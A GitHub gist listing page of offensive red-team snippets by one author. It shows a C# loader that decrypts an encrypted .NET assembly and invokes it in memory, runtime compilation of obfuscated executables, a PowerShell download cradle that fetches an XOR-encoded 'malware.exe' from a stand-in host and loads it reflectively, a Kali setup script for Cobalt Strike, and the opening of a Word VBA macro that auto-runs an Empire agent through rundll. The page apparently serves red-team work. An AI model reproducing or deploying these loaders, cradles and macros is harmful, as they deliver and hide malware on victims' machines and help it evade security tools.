Skip to content

Instantly share code, notes, and snippets.

View vivami's full-sized avatar

Vincent Van Mieghem vivami

133 followers · 0 following
View GitHub Profile
@vivami
vivami / LoadAndInvoke.cs
Last active April 18, 2019 04:16
Load Assembly and dynamically create an instance and invoke Main method
public static string srcTemplate = @"using System;
using System.Collections.Generic;
using System.IO;
using System.Reflection;
using System.Security.Cryptography;
namespace Loader {
public static class Loader {
private static readonly byte[] SALT = new byte[] { 0xba, 0xdc, 0x0f, 0xfe, 0xeb, 0xad, 0xbe, 0xfd, 0xea, 0xdb, 0xab, 0xef, 0xac, 0xe8, 0xac, 0xdc };
@vivami
vivami / compile.cs
Created August 31, 2018 10:07
Compile C# src at runtime.
compile(srcFinal, filename + "_obfuscated.exe");
static void compile(String source, String outfile) {
var provider_options = new Dictionary<string, string>
{
{"CompilerVersion","v3.5"}
};
var provider = new Microsoft.CSharp.CSharpCodeProvider(provider_options);
var compiler_params = new System.CodeDom.Compiler.CompilerParameters();
@vivami
vivami / encrypt.cs
Last active August 31, 2018 10:02
Encrypt .NET assembly to string
String path = args[0];
key = getRandomKey();
String filename = Path.GetFileNameWithoutExtension(path).ToString();
String obfuscatedBin = obfuscateBinary(path);
private String obfuscateBinary(String file) {
byte[] assemblyBytes = fileToByteArray(@file);
byte[] encryptedAssembly = encrypt(assemblyBytes, key);
return System.Convert.ToBase64String(encryptedAssembly);
}
@vivami
vivami / load-net.ps1
Created August 31, 2018 09:34
Load remote .NET assembly with PowerShell
$wc=New-Object System.Net.WebClient;$wc.Headers.Add("User-Agent","Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:49.0) Gecko/20100101 Firefox/49.0");$wc.Proxy=[System.Net.WebRequest]::DefaultWebProxy;$wc.Proxy.Credentials=[System.Net.CredentialCache]::DefaultNetworkCredentials
$k="XOR\_KEY";$i=0;[byte[]]$b=([byte[]]($wc.DownloadData("https://evil.computer/malware.exe")))|%{$_-bxor$k[$i++%$k.length]}
[System.Reflection.Assembly]::Load($b) | Out-Null
$parameters=@("arg1", "arg2")
[namespace.Class]::Main($parameters)
@vivami
vivami / prep_kali.sh
Last active April 11, 2023 23:41
Install additional package for kali
# update kali
apt update && apt upgrade -y
#install java8 for cobalt strike
cd /opt
echo "deb http://ppa.launchpad.net/webupd8team/java/ubuntu xenial main" | tee /etc/apt/sources.list.d/webupd8team-java.list
echo "deb-src http://ppa.launchpad.net/webupd8team/java/ubuntu xenial main" | tee -a /etc/apt/sources.list.d/webupd8team-java.list
apt-key adv --keyserver hkp://keyserver.ubuntu.com:80 --recv-keys eea14886
apt-get -y update
echo oracle-java8-installer shared/accepted-oracle-license-v1-1 select true | sudo /usr/bin/debconf-set-selections
@vivami
vivami / Empire_via_rundll-powershdll.vba
Last active April 27, 2023 23:58
VBA macro executing Empire Agent using PowerShdll via rundll
Sub AutoOpen()
Debugging
End Sub
Sub Document_Open()
Debugging
End Sub
Public Function Debugging() As Variant
DownloadDLL
@vivami
vivami / keybase.md
Created November 10, 2014 09:39
keybase.md

Keybase proof

I hereby claim:

  • I am vivami on github.
  • I am vanmieghem (https://keybase.io/vanmieghem) on keybase.
  • I have a public key whose fingerprint is D90D C025 6090 A35C BD62 C907 32F0 0526 6B85 75C8

To claim this, I am signing this object: